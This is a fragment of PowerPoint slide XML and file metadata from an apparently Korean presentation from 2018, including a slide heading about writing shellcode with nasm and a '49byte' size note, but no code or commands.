              <a:ea typeface="Tmon몬소리 Black" panose="02000A03000000000000"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:ea typeface="Tmon몬소리 Black" panose="02000A03000000000000"/>
              </a:rPr>
              <a:t>  --&gt; 49byte</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="24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500BC-F65B-4BCB-872C-6AB144C092D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="182096" y="216856"/>
            <a:ext cx="5432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3. Shell Code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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작성</a:t>
            </a:r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(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="3600" dirty="0" err="1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nasm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="3600" dirty="0">
                <a:latin typeface="Tmon몬소리 Black" panose="02000A03000000000000" pitchFamily="2" charset="-127"/>
                <a:ea typeface="Tmon몬소리 Black" panose="02000A03000000000000" pitchFamily="2" charset="-127"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="3600" dirty="0"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152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418</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>와이드스크린</PresentationFormat>
  <Paragraphs>75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Tmon몬소리 Black</vt:lpstr>
      <vt:lpstr>나눔바른고딕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경호 김</dc:creator>
  <cp:lastModifiedBy>경호 김</cp:lastModifiedBy>
  <cp:revision>15</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-12-05T03:04:30Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-12-21T03:19:12Z</dcterms:modified>
</cp:coreProperties>
</file>